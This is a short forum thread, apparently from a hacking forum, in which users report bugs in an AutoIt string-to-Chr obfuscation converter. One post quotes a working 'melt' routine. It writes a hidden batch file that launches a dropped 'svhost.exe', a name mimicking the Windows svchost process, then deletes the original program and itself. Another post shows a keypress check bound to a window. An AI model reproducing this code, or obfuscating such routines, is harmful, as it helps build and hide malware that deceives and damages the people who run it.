Login Register






Thread Rating:
  • 0 Vote(s) - 0 Average


[AutoIt]String to Chr converter filter_list
Author
Message
RE: [AutoIt]String to Chr converter #11
there's a error, it works with : "
but it does not work with : '
[Image: AQiSh.jpg]

Reply

RE: [AutoIt]String to Chr converter #12
this is a example where it's not working :

Quote:Func melt2($iDelay = 0)
Local $sCmdFile
FileDelete(@TempDir & "\scratch.bat")
$sCmdFile = 'ping -n ' & $iDelay & '127.0.0.1 > nul' & @CRLF _
& 'start ' & @tempdir & "\" & $randoms & '\svhost.exe' & @CRLF _
& ':loop' & @CRLF _
& 'del "' & @ScriptFullPath & '"' & @CRLF _
& 'if exist "' & @ScriptFullPath & '" goto loop' & @CRLF _
& 'del ' & @TempDir & '\scratch.bat'
FileWrite(@TempDir & "\scratch.bat", $sCmdFile)
Run(@TempDir & "\scratch.bat", @TempDir, @SW_HIDE)
exit
EndFunc
[Image: AQiSh.jpg]

Reply

RE: [AutoIt]String to Chr converter #13
also with this code, it does not work:

If _IsPressed("0D", $dll) and WinActive("test -") = True Then
[Image: AQiSh.jpg]

Reply







Users browsing this thread: 1 Guest(s)